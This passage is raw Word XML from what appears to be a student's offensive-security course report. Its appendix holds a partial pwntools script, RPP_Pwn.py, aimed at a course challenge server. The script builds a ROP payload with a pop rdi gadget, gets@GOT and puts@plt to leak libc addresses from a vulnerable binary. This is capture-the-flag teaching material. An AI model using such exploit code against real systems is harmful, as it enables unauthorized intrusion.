          <w:p w14:paraId="32F4C4AA" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t># getOffset()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7329722A" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># testPld()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="180DAF3E" w14:textId="77777777" w:rsidR="00F56DE3" w:rsidRPr="00F56DE3" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># pwnLocal()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B99CBB6" w14:textId="6008AC45" w:rsidR="0062558E" w:rsidRPr="00E23C61" w:rsidRDefault="00F56DE3" w:rsidP="00F56DE3">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F56DE3">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>pwnRemote()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70D98A19" w14:textId="2BE761B7" w:rsidR="00DD6B18" w:rsidRDefault="00DD6B18" w:rsidP="00200143"/>
    <w:p w14:paraId="669C772E" w14:textId="77777777" w:rsidR="00DD6B18" w:rsidRDefault="00DD6B18">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B95076A" w14:textId="274A4123" w:rsidR="00DD6B18" w:rsidRPr="00111129" w:rsidRDefault="00DD6B18" w:rsidP="00DD6B18">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Appendix_E:_School_Pwn.py"/>
      <w:bookmarkStart w:id="35" w:name="_Appendix_E:_RPP_Pwn.py"/>
      <w:bookmarkStart w:id="36" w:name="_Toc161243445"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidRPr="005264D0">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">E: </w:t>
      </w:r>
      <w:r w:rsidR="00B24F36" w:rsidRPr="00B24F36">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RPP_Pwn.py</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD6B18" w:rsidRPr="00E23C61" w14:paraId="11E83DA3" w14:textId="77777777" w:rsidTr="00DF5A55">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="5F138599" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>from pwn import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AF92BD5" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>from pwnlib.util.packing import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1413376A" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>import re</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4041975A" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>import struct</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F583A3A" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>import math</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7806A421" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="31D383B8" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HOST = 'offsec-chalbroker.osiris.cyber.nyu.edu'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A70FBE5" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PORT = 1343</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B7C2FB1" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="663E9FA5" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B7F7102" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># A function to convert encoded input to a string and remove text format characters</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="331F1B11" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Input: Encoded string</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B5E1DA3" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Output: Unencoded string</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74A3D479" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def cleanLine(ln):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C1B1321" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45B9A57D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>l = ansi_escape.sub('', str(ln, encoding='utf-8'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E0E97B4" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>return l</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10DED8CB" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="502F95B9" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># A function to find what part of the payload is being read as an address when the program crashes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C8FB9F7" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Input: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40DE17D1" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>Output: N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="234473A9" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def getOffset():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1415DFDB" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p = process('./rop')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="263996A6" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvuntil("tools..")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A5519BA" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.sendline(cyclic(100))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DC8A99E" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pld = leakPuts()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16200351" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline(pld)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="652C0A13" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.wait()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="658B57F6" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>cf = p.corefile</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DBA6923" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>stack = cf.rsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6360255A" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>info("rsp = %#x", stack)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A85CC07" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#pattern = cf.read(stack, 4)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79F11CAE" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#offset = cyclic_find(pattern)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31E62E08" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#info("offset = %d", offset)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6680B542" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>return 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B68256" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5EB30385" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="149ADCE9" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def leakGets():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14199716" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>binary = context.binary = ELF('./rop', checksec=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34C5E290" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="2691714D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># 0x00000000004006b3 : pop rdi ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34B45949" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>popRDI = p64(0x004006b3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05D215D9" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>retGdgt = p64(0x004004a9)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="679CCE84" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="05AB8FFF" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pltPuts = p64(binary.plt.puts)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t># Address to call</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21BFEEA6" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>gotGets = p64(binary.got.gets)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B3314F2" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51B75C0F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0253849E" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pld = cyclic(40)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59135AB8" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>pld += retGdgt + popRDI + gotGets + pltPuts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="568C1CF6" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>return pld</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="583FEB39" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
